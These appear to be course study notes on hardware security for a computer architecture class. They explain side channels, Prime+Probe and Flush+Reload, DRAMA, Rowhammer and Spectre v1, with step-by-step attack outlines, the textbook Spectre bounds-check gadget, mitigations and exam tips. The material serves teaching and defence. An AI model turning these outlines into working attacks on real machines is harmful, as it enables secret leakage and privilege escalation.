Notes/Hardware Security
🔒

Hardware Security

L18Post-Midterm

Side channel attacks and hardware vulnerabilities

Topics Covered

Side channel attacks overviewCache side channels (Prime+Probe, Flush+Reload)Memory side channels (DRAMA)RowhammerSpectre & MeltdownBranch predictor side channels
01

Side Channel Attacks Overview

A side channel is an unintended information leakage path that does not use the normal input/output interface of a system.

Characteristics:

  • Non-invasive: Does not require physical modification of the hardware
  • Stealthy: Hard to detect — the attacker uses normal instructions
  • Hard to fix: The leakage is inherent in how hardware optimizations work (caches, branch predictors, etc.)
  • Exploits shared resources between attacker and victim

Common side channels in hardware:

  • Timing: Measure how long an operation takes (cache hit vs. miss, branch prediction hit vs. miss)
  • Power: Measure power consumption patterns (different instructions consume different power)
  • Electromagnetic: Measure EM emissions from the chip

In CS 450, we focus on timing-based microarchitectural side channels — specifically cache and memory side channels.

Key Points

  • •Side channel = unintended information leakage, not through normal I/O
  • •Non-invasive, stealthy, hard to fix — inherent in hardware optimizations
  • •Exploits shared resources (caches, memory, branch predictors)
  • •Timing-based: measure cache hit/miss or DRAM row buffer hit/miss latency
02

Cache Side Channels: Prime+Probe & Flush+Reload

Cache side channels exploit the fact that cache hit/miss timing is observable and depends on what the victim has accessed.

General procedure:

  1. Set cache to a known state
  2. Wait for victim to execute
  3. Check what changed in the cache (via timing)

Prime+Probe:

  1. Prime: Attacker fills specific cache sets with their own data (accesses enough addresses to fill every way in target sets)
  2. Wait: Victim runs and potentially evicts some of the attacker's data
  3. Probe: Attacker re-accesses their data and times each access. If an access is slow (cache miss), the victim must have accessed that set → information leaked!

Flush+Reload: (requires shared memory, e.g., shared libraries)

  1. Flush: Attacker uses clflush to evict a shared cache line
  2. Wait: Victim runs
  3. Reload: Attacker accesses the same line and times it. If fast (cache hit), the victim accessed it. If slow (miss), the victim didn't.

Flush+Reload has higher resolution (per cache line vs. per set) but requires shared memory pages.

Key Points

  • •Cache side channels: hit/miss timing reveals victim access patterns
  • •Prime+Probe: fill sets → wait → re-access and time (slow = victim used that set)
  • •Flush+Reload: flush shared line → wait → reload and time (fast = victim used it)
  • •Flush+Reload has finer granularity but requires shared memory
âš 

Exam Tip

Be able to describe the 3 steps of each attack. Know the difference: Prime+Probe works without shared memory, Flush+Reload needs it but is more precise.

03

Memory Side Channels (DRAMA)

The DRAMA attack exploits DRAM row buffer timing as a side channel:

  • A row buffer hit is faster than a row buffer miss/conflict
  • If the attacker and victim share a DRAM bank, the attacker can detect which row the victim accessed by observing row buffer hit/miss timing

Attack procedure:

  1. Attacker accesses an address that maps to a specific bank and row (opens that row)
  2. Victim accesses memory
  3. Attacker re-accesses the same address. If fast (row hit), the victim did NOT access a different row in that bank. If slow (row conflict), the victim accessed a different row in the same bank → leaked info.

This is harder to mitigate than cache side channels because you cannot easily "flush" a row buffer, and DRAM is even more fundamental than caches.

Key Points

  • •DRAMA: row buffer hit/miss timing leaks which DRAM rows were accessed
  • •Requires attacker and victim to share a DRAM bank
  • •Row hit (fast) = victim didn't change the row; row conflict (slow) = victim used different row
  • •Harder to mitigate than cache side channels — row buffer is fundamental to DRAM
04

Rowhammer

Rowhammer is a hardware vulnerability where repeatedly activating (hammering) a DRAM row causes bit flips in adjacent rows.

Mechanism:

  • When a row is activated, the electrical disturbance affects neighboring rows
  • A single activation causes negligible disturbance, but thousands of rapid activations (within a refresh interval) can cause enough charge leakage in adjacent cells to flip bits
  • The attacked row is called the aggressor row; the row with bit flips is the victim row

Why it's dangerous:

  • An unprivileged user program can flip bits in memory it does NOT own
  • Can flip bits in page tables → privilege escalation
  • Can flip bits in other processes' data → data corruption
  • Demonstrated: user-level program gaining kernel privileges by flipping page table bits

Root cause: Electromagnetic interference between adjacent DRAM rows, worsened by smaller cell sizes and tighter row spacing in modern DRAM.

Mitigations: Increased refresh rate (but costs energy/performance), targeted row refresh (refresh victim rows when aggressor is hammered), ECC (but multi-bit flips can bypass it).

Key Points

  • •Repeated activation of aggressor row causes bit flips in adjacent victim rows
  • •Electromagnetic interference between tightly packed DRAM rows
  • •Can be exploited for privilege escalation (flip page table bits)
  • •Worsens with smaller process technology (tighter spacing)
  • •Mitigations: faster refresh, targeted refresh, ECC (limited)
âš 

Exam Tip

Know the mechanism (repeated row activation → adjacent row bit flips) and why it enables security attacks (flip bits you don't own, e.g., page table entries).

05

Spectre

Spectre exploits speculative execution combined with a cache side channel to leak secret data.

Key insight: When the CPU speculatively executes instructions down a mispredicted path, those instructions can access secret data. Even though the architectural results are rolled back, the cache state changes persist (cache is not rolled back on a squash).

Spectre v1 (Bounds Check Bypass) — simplified:

if (x < array1_size) {         // branch mispredicted as taken
    y = array2[array1[x] * 256]; // speculatively executed
}
        
  1. Attacker trains the branch predictor to predict "taken"
  2. Attacker provides a malicious x that is out-of-bounds (reads secret data from array1[x])
  3. The speculative load array2[secret * 256] brings a cache line into the cache that depends on the secret value
  4. Even after the branch resolves and speculative results are squashed, the cache line remains
  5. Attacker uses Flush+Reload or Prime+Probe on array2 to determine which cache line was loaded → reveals the secret value

Why it's hard to fix: Speculative execution is fundamental to performance. Preventing all speculative side effects would severely degrade performance.

Key Points

  • •Speculative execution + cache side channel = leak secret data
  • •Speculative instructions modify cache state, which is NOT rolled back
  • •Attacker trains branch predictor, provides out-of-bounds index, reads secret speculatively
  • •Secret value encoded in cache state, extracted via Flush+Reload or Prime+Probe
  • •Hard to fix: speculative execution is critical for performance
âš 

Exam Tip

Understand the two key components: (1) speculative execution accesses secret data, (2) cache side channel extracts the secret. Know why the cache is not rolled back.

Back to all notes